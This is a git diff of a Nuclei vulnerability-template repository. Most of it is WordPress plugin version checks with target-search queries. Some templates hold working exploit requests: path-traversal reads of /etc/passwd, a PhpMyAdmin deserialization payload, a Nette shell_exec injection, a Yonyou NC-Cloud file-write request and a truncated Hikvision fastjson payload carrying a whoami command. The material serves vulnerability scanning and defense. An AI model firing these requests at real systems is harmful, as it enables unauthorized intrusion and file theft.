7.2 + cve-id: CVE-2024-7351 + metadata: + fofa-query: "wp-content/plugins/simple-job-board/" + google-query: inurl:"/wp-content/plugins/simple-job-board/" + shodan-query: 'vuln:CVE-2024-7351' + tags: cve,wordpress,wp-plugin,simple-job-board,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/simple-job-board/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "simple-job-board" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.12.3') \ No newline at end of file diff --git a/poc/cve/CVE-2024-7559.yaml b/poc/cve/CVE-2024-7559.yaml new file mode 100644 index 0000000000..ce111b150d --- /dev/null +++ b/poc/cve/CVE-2024-7559.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7559 + +info: + name: > + File Manager Pro <= 8.3.7 - Authenticated (Subscriber+) Arbitrary File Upload + author: topscoder + severity: low + description: > + The File Manager Pro plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation and capability checks in the mk_file_folder_manager AJAX action in all versions up to, and including, 8.3.7. This makes it possible for authenticated attackers, with Subscriber-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f4b45791-4b85-4a2d-8019-1d438bd694cb?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-7559 + metadata: + fofa-query: "wp-content/plugins/wp-file-manager-pro/" + google-query: inurl:"/wp-content/plugins/wp-file-manager-pro/" + shodan-query: 'vuln:CVE-2024-7559' + tags: cve,wordpress,wp-plugin,wp-file-manager-pro,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-file-manager-pro/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-file-manager-pro" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 8.3.7') \ No newline at end of file diff --git a/poc/cve/CVE-2024-7568-03c9c97fbcce1159bd078f05cbf27da7.yaml b/poc/cve/CVE-2024-7568-03c9c97fbcce1159bd078f05cbf27da7.yaml new file mode 100644 index 0000000000..d55119432d --- /dev/null +++ b/poc/cve/CVE-2024-7568-03c9c97fbcce1159bd078f05cbf27da7.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7568-03c9c97fbcce1159bd078f05cbf27da7 + +info: + name: > + Favicon Generator <= 1.5 - Cross-Site Request Forgery to Arbitrary File Deletion + author: topscoder + severity: medium + description: > + The Favicon Generator plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.5. This is due to missing or incorrect nonce validation on the output_sub_admin_page_0 function. This makes it possible for unauthenticated attackers to delete arbitrary files on the server via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. The plugin author deleted the functionality of the plugin to patch this issue and close the plugin, we recommend seeking an alternative to this plugin. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/6eb3ad80-3510-4018-91af-b733ef62e28f?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H + cvss-score: 9.6 + cve-id: CVE-2024-7568 + metadata: + fofa-query: "wp-content/plugins/favicon-generator/" + google-query: inurl:"/wp-content/plugins/favicon-generator/" + shodan-query: 'vuln:CVE-2024-7568' + tags: cve,wordpress,wp-plugin,favicon-generator,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/favicon-generator/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "favicon-generator" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.5') \ No newline at end of file diff --git a/poc/cve/CVE-2024-7651-7d4af77ba7202b412fee68fa25bbbec8.yaml b/poc/cve/CVE-2024-7651-7d4af77ba7202b412fee68fa25bbbec8.yaml new file mode 100644 index 0000000000..924306604c --- /dev/null +++ b/poc/cve/CVE-2024-7651-7d4af77ba7202b412fee68fa25bbbec8.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7651-7d4af77ba7202b412fee68fa25bbbec8 + +info: + name: > + App Builder – Create Native Android & iOS Apps On The Flight <= 4.3.3 - Unauthenticated Limited SQL Injection via app-builder-search + author: topscoder + severity: critical + description: > + The App Builder – Create Native Android & iOS Apps On The Flight plugin for WordPress is vulnerable to limited SQL Injection via the ‘app-builder-search’ parameter in all versions up to, and including, 4.2.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/b43371a6-bcb5-4418-b5a5-85879775010c?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L + cvss-score: 5.6 + cve-id: CVE-2024-7651 + metadata: + fofa-query: "wp-content/plugins/app-builder/" + google-query: inurl:"/wp-content/plugins/app-builder/" + shodan-query: 'vuln:CVE-2024-7651' + tags: cve,wordpress,wp-plugin,app-builder,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/app-builder/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "app-builder" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.3.3') \ No newline at end of file diff --git a/poc/cve/CVE-2024-7656-cc628b96623048172302ddea18aada71.yaml b/poc/cve/CVE-2024-7656-cc628b96623048172302ddea18aada71.yaml new file mode 100644 index 0000000000..b7f14d6b9e --- /dev/null +++ b/poc/cve/CVE-2024-7656-cc628b96623048172302ddea18aada71.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7656-cc628b96623048172302ddea18aada71 + +info: + name: > + Image Hotspot by DevVN <= 1.2.5 - Authenticated (Author+) PHP Object Injection + author: topscoder + severity: low + description: > + The Image Hotspot by DevVN plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.2.5 via deserialization of untrusted input in the 'devvn_ihotspot_shortcode_func' function. This makes it possible for authenticated attackers, with Author-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/624bdb9e-6c50-4a00-9a04-1a32c938d48b?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-7656 + metadata: + fofa-query: "wp-content/plugins/devvn-image-hotspot/" + google-query: inurl:"/wp-content/plugins/devvn-image-hotspot/" + shodan-query: 'vuln:CVE-2024-7656' + tags: cve,wordpress,wp-plugin,devvn-image-hotspot,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/devvn-image-hotspot/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "devvn-image-hotspot" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.5') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8120-3613ebb9d30f84ec400bcf99e23d31d1.yaml b/poc/cve/CVE-2024-8120-3613ebb9d30f84ec400bcf99e23d31d1.yaml new file mode 100644 index 0000000000..0c4b80cd0b --- /dev/null +++ b/poc/cve/CVE-2024-8120-3613ebb9d30f84ec400bcf99e23d31d1.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8120-3613ebb9d30f84ec400bcf99e23d31d1 + +info: + name: > + ImageRecycle pdf & image compression <= 3.1.14 - Cross-Site Request in Several AJAX Actions + author: topscoder + severity: medium + description: > + The ImageRecycle pdf & image compression plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.1.14. This is due to missing or incorrect nonce validation on several functions in the class/class-image-otimizer.php file. This makes it possible for unauthenticated attackers to update plugin settings along with performing other actions via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/a06bba7f-0259-4b87-b3fe-6ad8318fda7d?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N + cvss-score: 4.7 + cve-id: CVE-2024-8120 + metadata: + fofa-query: "wp-content/plugins/imagerecycle-pdf-image-compression/" + google-query: inurl:"/wp-content/plugins/imagerecycle-pdf-image-compression/" + shodan-query: 'vuln:CVE-2024-8120' + tags: cve,wordpress,wp-plugin,imagerecycle-pdf-image-compression,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/imagerecycle-pdf-image-compression/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "imagerecycle-pdf-image-compression" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.1.14') \ No newline at end of file diff --git a/poc/cve/cve-2001-1473.yaml b/poc/cve/cve-2001-1473.yaml index 80480efb7b..d7ad14a2d1 100644 --- a/poc/cve/cve-2001-1473.yaml +++ b/poc/cve/cve-2001-1473.yaml @@ -1,11 +1,11 @@ id: CVE-2001-1473 - info: name: Deprecated SSHv1 Protocol Detection author: iamthefrogy severity: high - + tags: cve,cve2001,network,ssh,openssh description: SSHv1 is deprecated and has known cryptographic issues. + remediation: Upgrade to SSH 2.4 or later. reference: - https://www.kb.cert.org/vuls/id/684820 - https://nvd.nist.gov/vuln/detail/CVE-2001-1473 @@ -14,13 +14,13 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N cve-id: CVE-2001-1473 cwe-id: CWE-310 - network: - host: - "{{Hostname}}" - "{{Host}}:22" - matchers: - type: word words: - "SSH-1" + +# Updated by Chris on 2022/01/21 diff --git a/poc/cve/cve-2008-5587.yaml b/poc/cve/cve-2008-5587.yaml index fda684a006..e714f96cca 100644 --- a/poc/cve/cve-2008-5587.yaml +++ b/poc/cve/cve-2008-5587.yaml @@ -1,28 +1,27 @@ id: CVE-2008-5587 + info: name: phpPgAdmin 4.2.1 - '_language' Local File Inclusion author: dhiyaneshDK severity: medium - description: Directory traversal vulnerability in libraries/lib.inc.php in phpPgAdmin 4.2.1 and earlier, when register_globals is enabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the _language parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/7363 - - http://web.archive.org/web/20210121184707/https://www.securityfocus.com/bid/32670/ - - http://web.archive.org/web/20160520063306/http://secunia.com/advisories/33014 - - http://web.archive.org/web/20151104173853/http://secunia.com/advisories/33263 - classification: - cve-id: CVE-2008-5587 + reference: https://www.exploit-db.com/exploits/7363 + metadata: - shodan-query: http.title:"phpPgAdmin" - tags: cve,cve2008,lfi,phppgadmin + shodan-query: 'http.title:"phpPgAdmin"' + description: "Directory traversal vulnerability in libraries/lib.inc.php in phpPgAdmin 4.2.1 and earlier, when register_globals is enabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the _language parameter to index.php." + requests: - method: GET path: - '{{BaseURL}}/phpPgAdmin/index.php?_language=../../../../../../../../etc/passwd%00' + matchers-condition: and matchers: + - type: regex regex: - "root:[x*]:0:0" + - type: status status: - 200 diff --git a/poc/cve/cve-2009-1151.yaml b/poc/cve/cve-2009-1151.yaml index 3984eacf94..cc013e8a10 100644 --- a/poc/cve/cve-2009-1151.yaml +++ b/poc/cve/cve-2009-1151.yaml @@ -1,15 +1,21 @@ id: CVE-2009-1151 - info: - name: PhpMyAdmin Scripts/setup.php Deserialization Vulnerability + name: PhpMyAdmin Scripts - Remote Code Execution author: princechaddha - severity: high - description: Setup script used to create PhpMyAdmin configurations can be fooled by using a crafted POST request to include arbitrary PHP code in the generated configuration file. Combined with the ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code. + severity: critical + description: PhpMyAdmin Scripts 2.11.x before 2.11.9.5 and 3.x before 3.1.3.1 are susceptible to a remote code execution in setup.php that allows remote attackers to inject arbitrary PHP code into a configuration file via the save action. Combined with the ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code. reference: - https://www.phpmyadmin.net/security/PMASA-2009-3/ - https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433 - - + - http://phpmyadmin.svn.sourceforge.net/viewvc/phpmyadmin/branches/MAINT_2_11_9/phpMyAdmin/scripts/setup.php?r1=11514&r2=12301&pathrev=12301 + - http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php + - https://nvd.nist.gov/vuln/detail/CVE-2009-1151 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + cve-id: CVE-2009-1151 + cwe-id: CWE-77 + tags: cve,cve2009,phpmyadmin,rce,deserialization,kev requests: - raw: - | @@ -20,13 +26,13 @@ requests: Content-Type: application/x-www-form-urlencoded action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";} - matchers-condition: and matchers: - type: status status: - 200 - - type: regex regex: - "root:.*:0:0:" + +# Enhanced by mp on 2022/07/06 diff --git a/poc/cve/cve-2018-15473.yaml b/poc/cve/cve-2018-15473.yaml index e2eabe600d..2392e8714b 100644 --- a/poc/cve/cve-2018-15473.yaml +++ b/poc/cve/cve-2018-15473.yaml @@ -1,28 +1,28 @@ id: CVE-2018-15473 - info: name: OpenSSH Username Enumeration <= v7.7 author: r3dg33k,daffainfo,forgedhallpass severity: medium description: OpenSSH through 7.7 is prone to a user enumeration vulnerability due to not delaying bailout for an invalid authenticating user until after the packet containing the request has been fully parsed, related to auth2-gss.c, auth2-hostbased.c, and auth2-pubkey.c. - reference: https://nvd.nist.gov/vuln/detail/CVE-2018-15473 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2018-15473 + - https://github.com/openbsd/src/commit/779974d35b4859c07bc3cb8a12c74b43b0a7d1e0 + - https://bugs.debian.org/906236 + - http://www.openwall.com/lists/oss-security/2018/08/15/5 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.30 + cvss-score: 5.3 cve-id: CVE-2018-15473 cwe-id: CWE-362 - - + tags: network,openssh,cve,cve2018 network: - host: - "{{Hostname}}" - "{{Host}}:22" - matchers: - type: regex regex: - '(?i)SSH-2.0-OpenSSH_(?:[1-6][^\d][^\r]+|7\.[0-7][^\d][^\r]+)' - extractors: - type: regex regex: diff --git a/poc/cve/cve-2018-15535.yaml b/poc/cve/cve-2018-15535.yaml index a4fa48f002..ed7aa501ed 100644 --- a/poc/cve/cve-2018-15535.yaml +++ b/poc/cve/cve-2018-15535.yaml @@ -1,32 +1,31 @@ id: CVE-2018-15535 - info: - name: Responsive FileManager < 9.13.4 - Directory Traversal + name: Responsive FileManager <9.13.4 - Local File Inclusion author: daffainfo severity: high - description: filemanager/ajax_calls.php in tecrail Responsive FileManager before 9.13.4 uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize get_file sequences such as ".." that can resolve to a location that is outside of that directory, aka Directory Traversal. + description: Responsive FileManager before version 9.13.4 is susceptible to local file inclusion via filemanager/ajax_calls.php because it uses external input to construct a pathname that should be within a restricted directory. Instead, because it does not properly neutralize get_file sequences such as ".." can resolve to a location that is outside of that directory, aka local file inclusion. reference: - https://www.exploit-db.com/exploits/45271 - - https://www.cvedetails.com/cve/CVE-2018-15535 - + - https://nvd.nist.gov/vuln/detail/CVE-2018-15535 + - http://seclists.org/fulldisclosure/2018/Aug/34 + - https://www.exploit-db.com/exploits/45271/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 + cvss-score: 7.5 cve-id: CVE-2018-15535 cwe-id: CWE-22 - + tags: cve,cve2018,lfi requests: - method: GET path: - "{{BaseURL}}/filemanager/ajax_calls.php?action=get_file&sub_action=preview&preview_mode=text&title=source&file=../../../../etc/passwd" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/07/07 diff --git a/poc/cve/cve-2020-15227.yaml b/poc/cve/cve-2020-15227.yaml index 2adba03624..9a75579bdb 100644 --- a/poc/cve/cve-2020-15227.yaml +++ b/poc/cve/cve-2020-15227.yaml @@ -1,28 +1,34 @@ id: CVE-2020-15227 info: - name: nette Framework RCE - author: hackergautam - severity: high - reference: unknown - tags: cve,cve2020,nette,rce + name: Nette Framework RCE + author: becivells + severity: critical + description: Nette versions before 2.0.19, 2.1.13, 2.2.10, 2.3.14, 2.4.16, 3.0.6 are vulnerable to an code injection attack by passing specially formed parameters to URL that may possibly leading to RCE. Nette is a PHP/Composer MVC Framework. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2020-15227 + - https://github.com/nette/application/security/advisories/GHSA-8gv3-3j7f-wg94 + - https://www.pwnwiki.org/index.php?title=CVE-2020-15227_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E# + - https://github.com/Mr-xn/Penetration_Testing_POC/blob/02546075f378a9effeb6426fc17beb66b6d5c8ee/books/Nette%E6%A1%86%E6%9E%B6%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C(CVE-2020-15227).md + + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-15227 + cwe-id: CWE-74 requests: - method: GET path: - - "{{BaseURL}}/index.php/nette.micro/?callback=shell_exec&cmd=id&what=-1" + - "{{BaseURL}}/nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1" matchers-condition: and matchers: - - type: word - words: - - "uid" - - "gid" - part: body - condition: and + - type: regex + regex: + - "root:.*:0:0:" - type: status status: - 200 - diff --git a/poc/favicon/favicon-generator-7c646439e38a1ba7bbbc75a1ac2635c5.yaml b/poc/favicon/favicon-generator-7c646439e38a1ba7bbbc75a1ac2635c5.yaml new file mode 100644 index 0000000000..75e6da1f6e --- /dev/null +++ b/poc/favicon/favicon-generator-7c646439e38a1ba7bbbc75a1ac2635c5.yaml @@ -0,0 +1,59 @@ +id: favicon-generator-7c646439e38a1ba7bbbc75a1ac2635c5 + +info: + name: > + Favicon Generator <= 1.5 - Cross-Site Request Forgery to Arbitrary File Deletion + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/6eb3ad80-3510-4018-91af-b733ef62e28f?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/favicon-generator/" + google-query: inurl:"/wp-content/plugins/favicon-generator/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,favicon-generator,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/favicon-generator/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "favicon-generator" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.5') \ No newline at end of file diff --git a/poc/header/header-footer-code-08ebf57284e81768e19b2643c32c71af.yaml b/poc/header/header-footer-code-08ebf57284e81768e19b2643c32c71af.yaml new file mode 100644 index 0000000000..f29a9f0c99 --- /dev/null +++ b/poc/header/header-footer-code-08ebf57284e81768e19b2643c32c71af.yaml @@ -0,0 +1,59 @@ +id: header-footer-code-08ebf57284e81768e19b2643c32c71af + +info: + name: > + NinjaTeam Header Footer Custom Code < 1.2 - Authenticated (Admin+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3256da87-0d37-4c8f-9bac-95e3017e35d5?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/header-footer-code/" + google-query: inurl:"/wp-content/plugins/header-footer-code/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,header-footer-code,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/header-footer-code/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "header-footer-code" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1') \ No newline at end of file diff --git a/poc/header/header-footer-code-afbd01983360416a12cb28f807e89a8d.yaml b/poc/header/header-footer-code-afbd01983360416a12cb28f807e89a8d.yaml new file mode 100644 index 0000000000..70794beba5 --- /dev/null +++ b/poc/header/header-footer-code-afbd01983360416a12cb28f807e89a8d.yaml @@ -0,0 +1,59 @@ +id: header-footer-code-afbd01983360416a12cb28f807e89a8d + +info: + name: > + NinjaTeam Header Footer Custom Code < 1.2 - Authenticated (Admin+) Stored Cross-Site Scripting via CSS Styles + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/521af15c-983c-49dc-a90b-b090281db78a?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/header-footer-code/" + google-query: inurl:"/wp-content/plugins/header-footer-code/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,header-footer-code,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/header-footer-code/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "header-footer-code" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1') \ No newline at end of file diff --git a/poc/javascript/yonyou-nc-cloud-jsinvoke-rce.yaml b/poc/javascript/yonyou-nc-cloud-jsinvoke-rce.yaml index 653783158e..cef49f23fa 100644 --- a/poc/javascript/yonyou-nc-cloud-jsinvoke-rce.yaml +++ b/poc/javascript/yonyou-nc-cloud-jsinvoke-rce.yaml @@ -1,43 +1,36 @@ id: yonyou-nc-cloud-jsinvoke-rce info: - name: Yonyou NC Cloud - Remote Code Execution - author: Co5mos + name: yonyou-nc-cloud-jsinvoke-rce + author: pphua severity: critical - description: An arbitrary file upload vulnerability in the Yonyou NC-Cloud system. Attackers can upload any files to the server and upload web shells, thereby gaining command execution privileges on the server. - reference: - - https://mp.weixin.qq.com/s/qL5LurGfuShf1emJuay2_Q + tags: yonyou,nc-cloud,rce + reference: + - https://mp.weixin.qq.com/s/-2fNt7rBj6j2inEmqIaoUA metadata: max-request: 2 verified: true fofa-query: app="用友-NC-Cloud" - tags: yonyou,rce - -variables: - str1: "{{rand_base(5)}}.txt" http: - raw: - - | + - | POST /uapjs/jsinvoke/?action=invoke HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Content-Type: application/x-www-form-urlencoded + Accept-Encoding: gzip - {"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["{{md5('yonyou-nc-cloud-jsinvoke-rce')}}","webapps/nc_web/{{str1}}"]} - + {"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["StringObject","webapps/nc_web/{{randstr}}.txt"]} + - | - GET /{{str1}} HTTP/1.1 - Host: {{Hostname}} + GET /{{randstr}}.txt HTTP/1.1 + Content-Length: 138 + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 - matchers-condition: and matchers: - type: word - part: body words: - - '5d8be7535d6383e99315739724e10fa7' - - - type: status - status: - - 200 \ No newline at end of file + - "StringObject" + part: body \ No newline at end of file diff --git a/poc/microsoft/Hikvision_iVMS-8700_upload_action.yaml b/poc/microsoft/Hikvision_iVMS-8700_upload_action.yaml index 7e328a8b1b..0ebd67934b 100644 --- a/poc/microsoft/Hikvision_iVMS-8700_upload_action.yaml +++ b/poc/microsoft/Hikvision_iVMS-8700_upload_action.yaml @@ -1,50 +1,27 @@ id: HIKVISION info: - name: HHIKVISION iVMS-8700 upload Webshell file - author: zerZero Trust Security Attack and Defense Laboratory + name: HIKVISION + author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - HHIKVISION iVMS-8700 Comprehensive Security Management Platfor upload Webshell file + There is a command execution vulnerability in Hikvision's comprehensive security system. Hackers can execute system commands through the vulnerability metadata: - fofa-query: icon_hash="-911494769" - hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" + fofa-query: app="HIKVISION-综合安防管理平台" + hunter-query: web.title="综合安防管理平台" -variables: - str0: '{{BaseURL}}/eps/api/resourceOperations/uploadsecretKeyIbuilding' - http: - raw: - | - POST /eps/api/resourceOperations/upload?token={{toupper(md5(str0))}} HTTP/1.1 + POST /bic/ssoService/v1/applyCT HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Android 3.2.5; Mobile; rv:51.0) Gecko/51.0 Firefox/51.0 - Accept-Encoding: gzip, deflate - Accept: */* - Connection: close - Content-Length: 184 - Content-Type: multipart/form-data; boundary=c4155aff43901a8b2a19a4641a5efa15 - - --c4155aff43901a8b2a19a4641a5efa15 - Content-Disposition: form-data; name="fileUploader"; filename="test.jsp" - Content-Type: image/jpeg - - {{randstr}} - --c4155aff43901a8b2a19a4641a5efa15-- - - - | - GET /eps/upload/{{name}}.jsp HTTP/1.1 - Host: {{Hostname}} - - extractors: - - type: json - name: name - json: - - ".data.resourceUuid" - internal: true + Content-Type: application/json + Testcmd: whoami + + {"CTGT": {"a": {"@type": "java.lang.Class", "val": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource"}, "b": {"@type": "java.lang.Class", "val": "com.sun.org.apache.bcel.internal.util.ClassLoader"}, "c": {"@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource", "driverClassLoader": {"@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"}, "driverClassName": 